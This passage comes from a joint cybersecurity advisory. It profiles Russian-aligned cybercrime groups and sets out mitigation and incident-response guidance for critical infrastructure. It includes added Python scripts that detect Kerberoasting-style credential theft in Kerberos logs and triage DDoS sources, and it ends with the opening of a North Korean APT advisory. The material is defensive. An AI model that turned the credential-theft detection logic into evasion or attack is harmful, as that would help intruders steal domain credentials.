Since Russia’s invasion of Ukraine in February 2022, some cybercrime groups have independently publicly pledged support for the Russian government or the Russian people and/or threatened to conduct cyber operations to retaliate against perceived attacks against Russia or materiel support for Ukraine. These Russian-aligned cybercrime groups likely pose a threat to critical infrastructure organizations primarily through:

  • Deploying ransomware through which cyber actors remove victim access to data (usually via encryption), potentially causing significant disruption to operations.
  • Conducting DDoS attacks against websites. 
    • In a DDoS attack, the cyber actor generates enough requests to flood and overload the target page and stop it from responding. 
    • DDoS attacks are often accompanied by extortion. 
    • According to industry reporting, some cybercrime groups have recently carried out DDoS attacks against Ukrainian defense organizations, and one group claimed credit for a DDoS attack against a U.S. airport the actors perceived as supporting Ukraine (see the Killnet section).

Based on industry and open-source reporting, U.S., Australian, Canadian, New Zealand, and UK cyber authorities assess multiple Russian-aligned cybercrime groups pose a threat to critical infrastructure organizations. These groups include:

  • The CoomingProject
  • Killnet
  • MUMMY SPIDER 
  • SALTY SPIDER
  • SCULLY SPIDER
  • SMOKEY SPIDER
  • WIZARD SPIDER
  • The XakNet Team

Note: although some cybercrime groups may conduct cyber operations in support of the Russian government, U.S., Australian, Canadian, New Zealand, and UK cyber authorities assess that cyber criminals will most likely continue to operate primarily based on financial motivations, which may include targeting government and critical infrastructure organizations.

The CoomingProject

Overview: the CoomingProject is a criminal group that extorts money from victims by exposing or threatening to expose leaked data. Their data leak site was launched in August 2021.[31] The CoomingProject stated they would support the Russian Government in response to perceived cyberattacks against Russia.[32]

Killnet

Overview: according to open-source reporting, Killnet released a video pledging support to Russia.[33]

Victims: Killnet claimed credit for carrying out a DDoS attack against a U.S. airport in March 2022 in response to U.S. materiel support for Ukraine.[34]

MUMMY SPIDER

Overview: MUMMY SPIDER is a cybercrime group that creates, distributes, and operates the Emotet botnet. Emotet is advanced, modular malware that originated as a banking trojan (malware designed to steal information from banking systems but that may also be used to drop additional malware and ransomware). Today Emotet primarily functions as a downloader and distribution service for other cybercrime groups. Emotet has been used to deploy WIZARD SPIDER’s TrickBot, which is often a precursor to ransomware delivery. Emotet has worm-like features that enable rapid spreading in an infected network. 

Victims: according to open sources, Emotet has been used to target industries worldwide, including financial, e-commerce, healthcare, academia, government, and technology organizations’ networks.

Also known as: Gold Crestwood, TA542, TEMP.Mixmaster, UNC3443

Resources: for more information on Emotet, see joint Alert Emotet Malware. For more information on TrickBot, see joint CSA TrickBot Malware.

SALTY SPIDER

Overview: SALTY SPIDER is a cybercrime group that develops and operates the Sality botnet. Sality is a polymorphic file infector that was discovered in 2003; since then, it has been replaced by more advanced peer-to-peer (P2P) malware loaders.[35]

Victims: according to industry reporting, in February 2022, SALTY SPIDER conducted DDoS attacks against Ukrainian web forums used to discuss events relating to Russia’s military offensive against the city of Kharkiv.

Also known as: Sality

SCULLY SPIDER

Overview: SCULLY SPIDER is a cybercrime group that operates using a malware-as-a-service model; SCULLY SPIDER maintains command and control infrastructure and sells access to their malware and infrastructure to affiliates, who distribute their own malware.[36][37] SCULLY SPIDER develops and operates the DanaBot botnet, which originated primarily as a banking Trojan but expanded beyond banking in 2021 and has since been used to facilitate access for other types of malware, including TrickBot, DoppelDridex, and Zloader. Like Emotet, DanaBot effectively functions as an initial access vector for other malware, which can result in ransomware deployment.

According to industry reporting, recent DDoS activity by the DanaBot botnet suggests SCULLY SPIDER has operated in support of Russia’s military offensive in Ukraine. 

Victims: SCULLY SPIDER affiliates have primarily targeted organizations in the United States, Canada, Germany, United Kingdom, Australia, Italy, Poland, Mexico, and Ukraine.[38] According to industry reporting, in March 2022, DanaBot was used in DDoS attacks against multiple Ukrainian government organizations.

Also known as: Gold Opera

SMOKEY SPIDER

Overview: SMOKEY SPIDER is a cybercrime group that develops Smoke Loader (also known as Smoke Bot), a malicious bot that is used to upload other malware. Smoke Loader has been available since at least 2011, and operates as a malware distribution service for a number of different payloads, including—but not limited to—DanaBot, TrickBot, and Qakbot.

Victims: according to industry reporting, Smoke Loader was observed in March 2022 distributing DanaBot payloads that were subsequently used in DDoS attacks against Ukrainian targets.

Resources: for more information on Smoke Loader, see the MITRE ATT&CK webpage on Smoke Loader.

WIZARD SPIDER

Overview: WIZARD SPIDER is a cybercrime group that develops TrickBot malware and Conti ransomware. Historically, the group has paid a wage to the ransomware deployers (referred to as affiliates), some of whom may then receive a share of the proceeds from a successful ransomware attack. In addition to TrickBot, notable initial access and persistence vectors for affiliated actors include Emotet, Cobalt Strike, spearphishing, and stolen or weak Remote Desktop Protocol (RDP) credentials.

After obtaining access, WIZARD SPIDER affiliated actors have relied on various publicly available and otherwise legitimate tools to facilitate earlier stages of the attack lifecycle before deploying Conti ransomware.

WIZARD SPIDER pledged support to the Russian government and threatened critical infrastructure organizations of countries perceived to carry out cyberattacks or war against the Russian government.[39] They later revised this pledge and threatened to retaliate against perceived attacks against the Russian people.[40]

Victims: Conti victim organizations span across multiple industries, including construction and engineering, legal and professional services, manufacturing, and retail. In addition, WIZARD SPIDER affiliates have deployed Conti ransomware against U.S. healthcare and first responder networks.

Also known as: UNC2727, Gold Ulrick

Resources: for more information on Conti, see joint CSA Conti Ransomware. For more information on TrickBot, see joint CSA TrickBot Malware.

The XakNet Team

Overview: XakNet is a Russian-language cyber group that has been active as early as March 2022. According to open-source reporting, the XakNet Team threatened to target Ukrainian organizations in response to perceived DDoS or other attacks against Russia.[41] According to reporting from industry, on March 31, 2022, XakNet released a statement stating they would work “exclusively for the good of [Russia].” According to industry reporting, the XakNet Team may be working with or associated with Killnet actors, who claimed credit for the DDoS attacks against a U.S. airport (see the Killnet section).

Victims: according to industry reporting, in late March 2022, the XakNet Team leaked email contents of a Ukrainian government official. The leak was accompanied by a political statement criticizing the Ukrainian government, suggesting the leak was politically motivated. 

Mitigations

U.S., Australian, Canadian, New Zealand, and UK cyber authorities urge critical infrastructure organizations to prepare for and mitigate potential cyber threats by immediately (1) updating software, (2) enforcing MFA, (3) securing and monitoring RDP and other potentially risky services, and (4) providing end-user awareness and training.

  • Update software, including operating systems, applications, and firmware, on IT network assets. Prioritize patching known exploited vulnerabilities and critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
    • Consider using a centralized patch management system. For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.  
    • Consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats. CISA’s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IP addresses for accessible services and vulnerabilities.
  • Enforce MFA to the greatest extent possible and require accounts with password logins, including service accounts, to have strong passwords. Do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access. As Russian state-sponsored APT actors have demonstrated the ability to exploit default MFA protocols and known vulnerabilities, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios. For more information, see joint CSA Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability.
  • If you use RDP and/or other potentially risky services, secure and monitor them closely. RDP exploitation is one of the top initial infection vectors for ransomware, and risky services, including RDP, can allow unauthorized access to your session using an on-path attacker.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN) or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force attempts, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
  • Provide end-user awareness and training to help prevent successful targeted social engineering and spearphishing campaigns. Phishing is one of the top infection vectors for ransomware, and Russian state-sponsored APT actors have conducted successful spearphishing campaigns to gain credentials of target networks.
    • Ensure that employees are aware of potential cyber threats and delivery methods. 
    • Ensure that employees are aware of what to do and whom to contact when they receive a suspected phishing email or suspect a cyber incident.

As part of a longer-term effort, implement network segmentation to separate network segments based on role and functionality. Network segmentation can help prevent the spread of ransomware and threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks.

  • Ensure OT assets are not externally accessible. Ensure strong identity and access management when OT assets need to be externally accessible.
  • Appropriately implement network segmentation between IT and OT networks. Network segmentation limits the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.
  • Organize OT assets into logical zones by considering criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit ICS protocols from traversing the IT network.

To further prepare for and mitigate cyber threats from Russian state-sponsored or criminal actors, U.S., Australian, Canadian, New Zealand, and UK cyber authorities encourage critical infrastructure organizations to implement the recommendations listed below.

Preparing for Cyber Incidents

  • Create, maintain, and exercise a cyber incident response and continuity of operations plan. 
    • Ensure the cyber incident response plan contains ransomware- and DDoS-specific annexes. For information on preparing for DDoS attacks, see NCSC-UK guidance on preparing for denial-of-service attacks.
    • Keep hard copies of the incident response plan to ensure responders and network defenders can access the plan if the network has been shut down by ransomware, etc.
  • Maintain offline (i.e., physically disconnected) backups of data. Backup procedures should be conducted on a frequent, regular basis (at a minimum every 90 days). Regularly test backup procedures and ensure that backups are isolated from network connections that could enable the spread of malware.
    • Ensure the backup keys are kept offline as well, to prevent them being encrypted in a ransomware incident.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure with a particular focus on key data assets.
  • Develop recovery documentation that includes configuration settings for common devices and critical equipment. Such documentation can enable more efficient recovery following an incident.
  • Identify the attack surface by mapping and accounting all external-facing assets (applications, servers, IP addresses) that are vulnerable to DDoS attacks or other cyber operations.
  • For OT assets/networks:
    • Identify a resilience plan that addresses how to operate if you lose access to—or control of—the IT and/or OT environment.
    • Identify OT and IT network interdependencies and develop workarounds or manual controls to ensure ICS networks can be isolated from IT networks if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans, such as manual controls, so that safety-critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.
    • Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.
    • Implement data backup procedures.
    • Develop recovery documents that include configuration settings for common devices and critical OT equipment. 

Identity and Access Management

  • Require accounts with password logins, including service accounts, to have strong passwords and do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access. Consider using a password manager; see NCSC-UK’s Password Manager Buyers Guide for guidance.
  • Implement authentication timeout and lockout features to prevent repeated failed login attempts and successful brute-force attempts.
  • Create a deny list of known compromised credentials and prevent users from using known-compromised passwords.
  • Secure credentials by restricting where accounts and credentials can be used and by using local device credential protection features. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials.
    • Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.
    • Ensure storage of clear text passwords in Local Security Authority Subsystem Service (LSASS) memory is disabled. Note: for Windows 8, this is enabled by default. For more information see Microsoft Security Advisory Update to Improve Credentials Protection and Management.
    • Consider disabling or limiting NTLM and WDigest Authentication.
    • Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
    • Minimize the Active Directory (AD) attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ Ticket Granting Service (TGS) and can be used to obtain hashed credentials that malicious cyber actors attempt to crack.
  • Audit domain controllers to log successful Kerberos TGS requests and ensure the events are monitored for anomalous activity.  
  • Secure accounts.
    • Enforce the principle of least privilege. Administrator accounts should have the minimum permission necessary to complete their tasks.
    • Ensure there are unique and distinct administrative accounts for each set of administrative tasks.
    • Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
  • Disable inactive accounts uniformly across the AD, MFA systems, etc.
  • Implement time-based access for privileged accounts. The FBI and CISA observed cybercriminals conducting increasingly impactful attacks against U.S. entities on holidays and weekends in 2021. Threat actors may view holidays and weekends—when offices are normally closed—as attractive timeframes, as there are fewer network defenders and IT support personnel at victim organizations. The just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the zero-trust model) by setting network-wide policy to automatically disable admin accounts at the AD level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. 
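
One way to monitor the successful Kerberos TGS requests that the domain controller audit item above asks for, shown as an added example that is not part of the advisory. It assumes Event ID 4769 records have already been exported as dictionaries; the burst window, the threshold, and all sample accounts and addresses are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                # ticket encryption type 0x17 (RC4-HMAC)
WINDOW = timedelta(minutes=5)  # assumed burst window
MIN_SERVICES = 4               # assumed threshold; tune to your own baseline


def tgs_event(ts, user, service, etype, ip, status="0x0"):
    """Build one constructed Event ID 4769 record (subset of the real fields)."""
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype,
            "IpAddress": ip, "Status": status}


# Constructed sample data, not taken from any real environment.
SAMPLE_EVENTS = [
    # One account requests tickets for five service accounts in under a minute.
    tgs_event("2022-04-20T02:14:05", "jdoe@CORP.EXAMPLE", "svc_sql", "0x17", "10.0.5.23"),
    tgs_event("2022-04-20T02:14:07", "jdoe@CORP.EXAMPLE", "svc_web", "0x17", "10.0.5.23"),
    tgs_event("2022-04-20T02:14:09", "jdoe@CORP.EXAMPLE", "svc_backup", "0x17", "10.0.5.23"),
    tgs_event("2022-04-20T02:14:12", "jdoe@CORP.EXAMPLE", "svc_report", "0x17", "10.0.5.23"),
    tgs_event("2022-04-20T02:14:40", "jdoe@CORP.EXAMPLE", "svc_sharepoint", "0x17", "10.0.5.23"),
    # Failed request: ignored, the advisory asks for successful requests.
    tgs_event("2022-04-20T02:14:50", "jdoe@CORP.EXAMPLE", "svc_hr", "0x17", "10.0.5.23", "0x20"),
    # Ordinary daytime use, AES tickets, one machine-account service.
    tgs_event("2022-04-20T09:01:00", "asmith@CORP.EXAMPLE", "svc_web", "0x12", "10.0.7.8"),
    tgs_event("2022-04-20T09:30:00", "asmith@CORP.EXAMPLE", "FILESRV01$", "0x12", "10.0.7.8"),
    tgs_event("2022-04-20T13:02:00", "asmith@CORP.EXAMPLE", "svc_report", "0x12", "10.0.7.8"),
    # Four services, but spread across the morning: no burst.
    tgs_event("2022-04-20T08:00:00", "bwong@CORP.EXAMPLE", "svc_sql", "0x12", "10.0.7.9"),
    tgs_event("2022-04-20T09:10:00", "bwong@CORP.EXAMPLE", "svc_web", "0x12", "10.0.7.9"),
    tgs_event("2022-04-20T10:20:00", "bwong@CORP.EXAMPLE", "svc_backup", "0x12", "10.0.7.9"),
    tgs_event("2022-04-20T11:30:00", "bwong@CORP.EXAMPLE", "svc_report", "0x12", "10.0.7.9"),
]


def is_candidate(ev):
    """Successful TGS request for a service that runs under a user account."""
    if ev["EventID"] != 4769 or int(ev["Status"], 16) != 0:
        return False
    service = ev["ServiceName"]
    # Machine accounts ("$") and krbtgt have long random keys; skip them.
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_tgs_bursts(events, window=WINDOW, min_services=MIN_SERVICES):
    """Return, per account, the densest window of distinct service requests."""
    per_account = defaultdict(list)
    for ev in events:
        if is_candidate(ev):
            per_account[ev["TargetUserName"]].append((
                datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"],
                int(ev["TicketEncryptionType"], 16), ev["IpAddress"]))
    findings = []
    for account, reqs in sorted(per_account.items()):
        reqs.sort()
        best, start = None, 0
        for end in range(len(reqs)):
            # Slide the left edge so the span never exceeds the window.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            span = reqs[start:end + 1]
            services = sorted({svc for _, svc, _, _ in span})
            if len(services) >= min_services and (
                    best is None or len(services) > len(best["services"])):
                best = {
                    "account": account,
                    "first_seen": span[0][0].isoformat(),
                    "last_seen": span[-1][0].isoformat(),
                    "services": services,
                    # RC4 tickets requested where AES is available raise priority.
                    "rc4_requests": sum(1 for r in span if r[2] == RC4_HMAC),
                    "sources": sorted({r[3] for r in span}),
                }
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for finding in find_tgs_bursts(SAMPLE_EVENTS):
        print(finding)
```
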

Protective Controls and Architecture

  • Identify, detect, and investigate abnormal activity that may indicate lateral movement by a threat actor, ransomware, or other malware. Use network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Implement a firewall and configure it to block Domain Name System (DNS) responses from outside the enterprise network or drop Internet Control Message Protocol (ICMP) packets. Review which admin services need to be accessible externally and allow those explicitly, blocking all others by default.
    • U.S. Defense Industrial Base organizations may sign up for the NSA Cybersecurity Collaboration Center’s Protective Domain Name System (PDNS) services.
  • Enable web application firewalls to mitigate application-level DDoS attacks. 
  • Implement a multi-content delivery network (CDN) solution. This will minimize the threat of DDoS attacks by distributing and balancing web traffic across a network.

Vulnerability and Configuration Management

  • Use an antivirus program that uses heuristics and reputational ratings to check a file’s prevalence and digital signature prior to execution. Note: organizations should assess the risks inherent in their software supply chain (including its security/antivirus software supply chain) in light of the existing threat landscape.
    • Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. 
    • Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
  • Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses.
  • Disable all unnecessary ports and protocols.
    • Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.
    • Turn off or disable any unnecessary services (e.g., PowerShell) or functionality within devices.
  • Identify business-to-business VPNs and block high-risk protocols.
  • Ensure OT hardware is in read-only mode.
  • Enable strong spam filters.
    • Enable strong spam filters to prevent phishing emails from reaching end users.
    • Filter emails containing executable files to prevent them from reaching end users.
    • Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments.
  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Open document readers in protected viewing modes to help prevent active content from running.

Responding to Cyber Incidents

U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge network defenders of critical infrastructure organizations to exercise due diligence in identifying indicators of malicious activity. Organizations detecting potential APT or ransomware activity in their IT or OT networks should:

  1. Immediately isolate affected systems.
  2. For DDoS attacks:
    1. Identify the source address originating the attack via the SIEM or logging service. If the attack is originating from a single pool of IP addresses, block IP traffic from suspected IPs via access control lists or by contacting your internet service provider (ISP).
    2. Enable firewall rate limiting to restrict the amount of IP traffic coming in from suspected IP addresses.
    3. Notify your ISP and enable remote triggered blackhole (RTBH).
  3. Secure backups. Ensure your backup data is offline and secure. If possible, scan your backup data with an antivirus program to ensure it is free of malware.
  4. Collect and review relevant logs, data, and artifacts.
  5. Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
  6. Report incidents to appropriate cyber and law enforcement authorities:
    • U.S. organizations: share information about incidents and anomalous activity to CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. For ransomware incidents, organizations can also report to the U.S. Secret Service via a U.S. Secret Service Field Office.
    • Australian organizations: if you have questions about this advice or have indications that your environment has been compromised, call the ACSC at 1300 CYBER1 (1300 292 371). To report an incident see cyber.gov.au/acsc/report.
    • Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.
    • New Zealand organizations: if your organization requires assistance from the National Cyber Security Centre, contact them directly via telephone at (04) 498-7654 or via email at ncscincidents@ncsc.govt.nz.
    • UK organizations: report a significant cybersecurity incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
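
For step 2 above, the following added example (not part of the advisory) shows how exported web access logs can be aggregated to decide whether traffic comes from a single pool of addresses that suits an access control list, or is too distributed and calls for rate limiting and ISP involvement. The log format, the /24 and /56 grouping, the 80 percent threshold, and the sample traffic (documentation address ranges) are all assumptions.

```python
import ipaddress
import re
from collections import Counter

# Common Log Format: source address first, then request and status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (\d{3})\b')


def sample_log():
    """Constructed access log using documentation ranges, not real traffic."""
    fmt = '{ip} - - [20/Apr/2022:02:{m:02d}:{s:02d} +0000] "GET {p} HTTP/1.1" {c} 512'
    lines = []
    for host in range(1, 41):      # 40 hosts in one /24, 25 requests each
        for n in range(25):
            lines.append(fmt.format(ip=f"198.51.100.{host}", m=n, s=host,
                                    p="/search?q=x", c=503))
    for host in range(1, 21):      # 20 ordinary clients, 3 requests each
        for n in range(3):
            lines.append(fmt.format(ip=f"203.0.113.{host}", m=n, s=host, p="/", c=200))
    for host in range(1, 11):      # 10 ordinary clients, 2 requests each
        for n in range(2):
            lines.append(fmt.format(ip=f"192.0.2.{host}", m=n, s=host, p="/", c=200))
    lines.append("corrupted line without an address")
    return lines


def source_counts(lines):
    """Count requests per source address, skipping lines that do not parse."""
    counts = Counter()
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        try:
            counts[ipaddress.ip_address(match.group(1))] += 1
        except ValueError:
            continue
    return counts


def network_counts(ip_counts, v4_prefix=24, v6_prefix=56):
    """Roll per-address counts up into their enclosing networks."""
    nets = Counter()
    for ip, count in ip_counts.items():
        prefix = v4_prefix if ip.version == 4 else v6_prefix
        nets[ipaddress.ip_network(f"{ip}/{prefix}", strict=False)] += count
    return nets


def assess(lines, pool_share=0.8, max_pools=3, allow=()):
    """Decide whether a few networks account for most of the traffic.

    allow lists networks that must never be proposed for blocking, such as
    your own egress ranges, monitoring probes or CDN back-ends.
    """
    ips = source_counts(lines)
    total = sum(ips.values())
    if total == 0:
        return {"total": 0, "concentrated": False, "share": 0.0,
                "acl_candidates": [], "top_sources": []}
    allowed = [ipaddress.ip_network(a) for a in allow]
    picked, covered = [], 0
    for net, count in network_counts(ips).most_common():
        if len(picked) == max_pools or covered / total >= pool_share:
            break
        if any(net.version == a.version and net.subnet_of(a) for a in allowed):
            continue
        picked.append(net)
        covered += count
    concentrated = covered / total >= pool_share
    return {
        "total": total,
        "concentrated": concentrated,
        "share": round(covered / total, 3),
        # Candidates are offered only when a small pool explains the traffic.
        "acl_candidates": [str(n) for n in picked] if concentrated else [],
        "top_sources": [(str(ip), n) for ip, n in ips.most_common(5)],
    }


if __name__ == "__main__":
    print(assess(sample_log()))
```

Review the candidate networks against known legitimate sources before adding them to an access control list; when `concentrated` is false, no list of a few networks will cover the traffic.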

For additional guidance on responding to a ransomware incident, see the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for guidance on hunting or investigating a network, and for common mistakes in incident handling.

Additionally, CISA, the FBI, and NSA encourage U.S. critical infrastructure owners and operators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail each step for both incident and vulnerability response.  

Note: U.S., Australian, Canadian, New Zealand, and UK cyber authorities strongly discourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom does not guarantee that a victim’s files will be recovered.

RESOURCES DISCLAIMER

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, NSA, FBI, ACSC, CCCS, NZ NCSC, NCSC-UK, and the UK National Crime Agency (NCA) do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

TRADEMARK RECOGNITION

MITRE and ATT&CK are registered trademarks of The MITRE Corporation. Kubernetes is a registered trademark of The Linux Foundation.

PURPOSE 

This document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

REFERENCES

[1] Cybersecurity and Infrastructure Security Agency
[2] Federal Bureau of Investigation
[3] National Security Agency
[4] Australian Cyber Security Centre
[5] Canadian Centre for Cyber Security
[6] New Zealand's National Cyber Security Centre
[7] United Kingdom's National Cyber Security Centre
[8] United Kingdom's National Crime Agency
[9] U.S. DOJ Press Release: U.S. Charges Russian FSB Officers and Their Criminal Conspirators for Hacking Yahoo and Millions of Email Accounts
[10] U.S. DOJ Press Release: Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide
[11] CrowdStrike Blog: Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign
[12] U.S. White House Statement: FACT SHEET: Imposing Costs for Harmful Foreign Activities by the Russian
[13] Government of Canada Statement on SolarWinds Cyber Compromise
[14] UK Government Press Release: Russia: UK and US expose global campaign of malign activity by Russian intelligence services
[15] MITRE ATT&CK: APT29
[16] Joint CSA Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware
[17] Joint CSA Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments
[18] MITRE ATT&CK APT28
[19] Joint CSA New Sandworm Malware Cyclops Blink Replaces VPNFilter
[20] UK Government Press Release: UK condemns Russia's GRU over Georgia cyber-attacks
[21] U.S. Department of State, Press Statement: The United States Condemns Russian Cyber Attack Against the Country of Georgia
[22] Government of Canada CSE Statement on Malicious Russian Cyber Activity Targeting Georgia
[23] UK Government Press Release: UK condemns Russia's GRU over Georgia cyber-attacks
[24] MITRE ATT&CK The Sandworm Team
[25] U.S. Department of the Treasury Press Release: Treasury Sanctions Russian Government Research Institution Connected to the Triton Malware
[26] UK Government Press Release: UK exposes Russian spy agency behind cyber incident
[27] U.S. DOJ Press Release: Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide
[28] MITRE ATT&CK TEMP.Veles
[29] NSA and NCSC-UK Cybersecurity Advisory Turla Group Exploits Iranian APT To Expand Coverage Of Victims
[30] CrowdStrike Adversary Profile: VENOMOUS BEAR
[31] KELA Cybersecurity Intelligence Center: Ain’t No Actor Trustworthy Enough: The importance of validating sources
[32] Twitter: Valery Marchive Status, Feb. 25, 2022 1:41 PM
[33] The Record by Recorded Future: Russia or Ukraine: Hacking Groups Take Sides
[34] Twitter: CyberKnow Status, March 29, 2022, 7:54 AM
[35] CrowdStrike Blog: Who is Salty Spider (Sality)?
[36] Proofpoint Blog: New Year, New Version of DanaBot
[37] Zscaler Blog: Spike in DanaBot Malware Activity
[38] Proofpoint Blog: New Year, New Version of DanaBot
[39] The Record by Recorded Future: Russia or Ukraine: Hacking Groups Take Sides
[40] TechTarget: Conti ransomware gang backs Russia, threatens US
[41] The Record by Recorded Future: Russia or Ukraine: Hacking Groups Take Sides

ACKNOWLEDGEMENTS

The U.S., Australian, Canadian, New Zealand, and UK cyber authorities would like to thank CrowdStrike, Google, LookingGlass Cyber, Mandiant, Microsoft, and Secureworks for their contributions to this CSA.

Contact Information

  • U.S. organizations: to report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov.
  • Australian organizations: visit cyber.gov.au/acsc/report or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
  • Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.
  • New Zealand organizations: report cyber security incidents to ncscincidents@ncsc.govt.nz or call 04 498 7654.
  • United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Revisions
  • April 20, 2022: Initial version
  • May 9, 2022: Added detail on GTsST use of VPNFilter.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-108A: TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

US-CERT Security Alerts - Mon, 04/18/2022 - 05:38
Original release date: April 18, 2022 | Last revised: April 20, 2022
Summary

Actions to take today to mitigate cyber threats to cryptocurrency:
• Patch all systems.
• Prioritize patching known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Use multifactor authentication.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly tracked by the cybersecurity industry as Lazarus Group, APT38, BlueNoroff, and Stardust Chollima. For more information on North Korean state-sponsored malicious cyber activity, visit https://www.us-cert.cisa.gov/northkorea.

